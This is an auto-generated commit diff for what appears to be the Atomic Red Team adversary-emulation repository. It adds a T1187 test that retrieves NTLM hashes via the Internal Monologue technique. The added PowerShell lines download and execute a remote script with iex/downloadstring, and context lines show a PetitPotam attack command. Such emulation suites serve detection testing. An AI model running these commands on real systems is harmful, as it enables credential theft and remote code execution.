Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -43,6 +43,7 @@ credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Cred
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
+credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -29,6 +29,7 @@ credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Cred
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
+credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
 credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -63,6 +63,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
   - Atomic Test #1: PetitPotam [windows]
+  - Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #1: AppleScript - Prompt User for Password [macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -45,6 +45,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
   - Atomic Test #1: PetitPotam [windows]
+  - Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #2: PowerShell - Prompt User for Password [windows]

atomics/Indexes/index.yaml

@@ -2414,6 +2414,17 @@ credential-access:
         command: |
           & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
           Write-Host "End of PetitPotam attack"
+    - name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+      auto_generated_guid: 7f06b25c-799e-40f1-89db-999c9cc84317
+      description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+        technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+          Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+        name: powershell
   T1606:
     technique:
       object_marking_refs:

atomics/T1187/T1187.md

@@ -17,6 +17,8 @@ There are several different ways this can occur. (Citation: Osanda Stealing NetN
 
 - [Atomic Test #1 - PetitPotam](#atomic-test-1---petitpotam)
 
+- [Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS](#atomic-test-2---winpwn---powersharppack---retrieving-ntlm-hashes-without-touching-lsass)
+
 
 <br/>
 
@@ -67,4 +69,33 @@ Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd5
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7f06b25c-799e-40f1-89db-999c9cc84317
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+```
+
+
+
+
+
+
 <br/>